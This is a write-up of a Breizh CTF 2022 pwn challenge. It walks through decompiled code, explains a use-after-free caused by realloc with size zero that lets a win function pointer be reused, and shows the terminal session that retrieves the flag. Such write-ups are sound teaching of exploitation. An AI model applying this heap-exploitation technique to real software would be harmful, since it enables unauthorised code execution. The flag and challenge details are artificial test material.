[Breizh CTF 2022 - pwn] Faible Ty Reseau

Faible Ty Réseau is a basic heap-like challenge, it allows us to create a configuration, edit it, call a function pointer on it and finally to free it:

1
int __cdecl main(int argc, const char **argv, const char **envp)
2
{
3
  int v4; // [rsp+4h] [rbp-Ch] BYREF
4
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]
5

6
  v5 = __readfsqword(0x28u);
7
  while ( 1 )
8
  {
9
    puts(aVousN);
10
    printf(a1ModifierLesPa, argv);
11
    fflush(stdout);
12
    v4 = 0;
13
    argv = &v4;
14
    __isoc99_scanf(&unk_21F3, &v4);
15
    switch ( v4 )
16
    {
17
      case 0:
18
        printf("wtf ?");
19
        fflush(stdout);
20
        break;
21
      case 1:
22
        create();
23
        break;
24
      case 2:
25
        delete();
26
        break;
27
      case 3:
28
        exec();
29
        break;
30
      case 4:
31
        show();
32
        break;
33
      case 5:
34
        exit(0);
35
      default:
36
        continue;
37
    }
38
  }
39
}

They are many ways to pwn the challenge, I did it by taking advantage of the UAF in create:

1
__int64 create()
2
{
3
  int v1; // [rsp+4h] [rbp-1Ch]
4
  int v2; // [rsp+8h] [rbp-18h]
5
  void *buf; // [rsp+10h] [rbp-10h]
6
  void *v4; // [rsp+18h] [rbp-8h]
7

8
  if ( !ptr )
9
  {
10
    ptr = malloc(0x18uLL);
11
    byte_4104 = 1;
12
  }
13
  buf = calloc(0x19uLL, 1uLL);
14
  write(1, "New hostname : ", 0x10uLL);
15
  v1 = read(1, buf, 0x18uLL);
16
  *(buf + v1) = 0;
17
  v4 = calloc(0x19uLL, 1uLL);
18
  printf("\nNew host : ");
19
  fflush(stdout);
20
  v2 = read(1, v4, 0x18uLL);
21
  *(v4 + v2) = 0;
22
  fflush(stdout);
23
  if ( byte_4104 != 1 )
24
  {
25
    fflush(stdout);
26
    realloc(ptr, v1 + v2 - 2);
27
    *ptr = buf;
28
    *(ptr + 1) = v4;
29
    *(ptr + 2) = sub_1259;
30
  }
31
  byte_4104 = 0;
32
  *ptr = buf;
33
  *(ptr + 1) = v4;
34
  *(ptr + 2) = sub_1259;
35
  fflush(stdout);
36
  alloc_admin();
37
  return 0LL;
38
}

As we can see, if ptr is not NULL and that we enter only one byte for each read (by sending only \n for example), then we will trigger a realloc(ptr, 1 + 1 - 2) which frees ptr, ptr being freed the freelist is pointing on ptr. Now let’s take a look at the alloc_admin function:

1
__int64 alloc_admin()
2
{
3
  char *v1; // [rsp+0h] [rbp-10h]
4
  char *v2; // [rsp+8h] [rbp-8h]
5

6
  fflush(stdout);
7
  qword_40F8 = malloc(0x18uLL);
8
  fflush(stdout);
9
  v1 = malloc(0xAuLL);
10
  fflush(stdout);
11
  strcpy(v1, "Admin");
12
  fflush(stdout);
13
  v2 = malloc(0xAuLL);
14
  fflush(stdout);
15
  strcpy(v2, "000000000");
16
  fflush(stdout);
17
  *qword_40F8 = v1;
18
  *(qword_40F8 + 8) = v2;
19
  *(qword_40F8 + 16) = win;
20
  fflush(stdout);
21
  return 0LL;
22
}

By allocating 0x18 bytes, it gets the previous freed ptr and writes over a few fields like the function pointer. Then we just have to call the exec function which will call the win function:

1
int exec()
2
{
3
  if ( ptr )
4
    return (*(ptr + 2))();
5
  printf("Pas de configuration !");
6
  return fflush(stdout);
7
}

Which gives us:

1
nasm@off:~/ctf/bzhCTF/pwn$ ./FTM
2
Vous n'êtes pas connecté (anonyme)
3
1. Modifier les paramètres de connexion
4
2. Restaurer la configutation d'usine
5
3. Tester la configuration
6
4. Voir la configuration courante
7
5. Quitter (au revoir !)
8
>>>> 1
9
New hostname : dumb
10

11
New host : dumb
12
Vous n'êtes pas connecté (anonyme)
13
1. Modifier les paramètres de connexion
14
2. Restaurer la configutation d'usine
15
3. Tester la configuration
16
4. Voir la configuration courante
17
5. Quitter (au revoir !)
18
>>>> 1
19
New hostname :
20

21
New host :
22
Vous n'êtes pas connecté (anonyme)
23
1. Modifier les paramètres de connexion
24
2. Restaurer la configutation d'usine
25
3. Tester la configuration
26
4. Voir la configuration courante
27
5. Quitter (au revoir !)
28
>>>> 3
29
BZHCTF{9024b719d4449bc9827478e50f0279427ccb542cc3ecdec21fce38c52b29561c}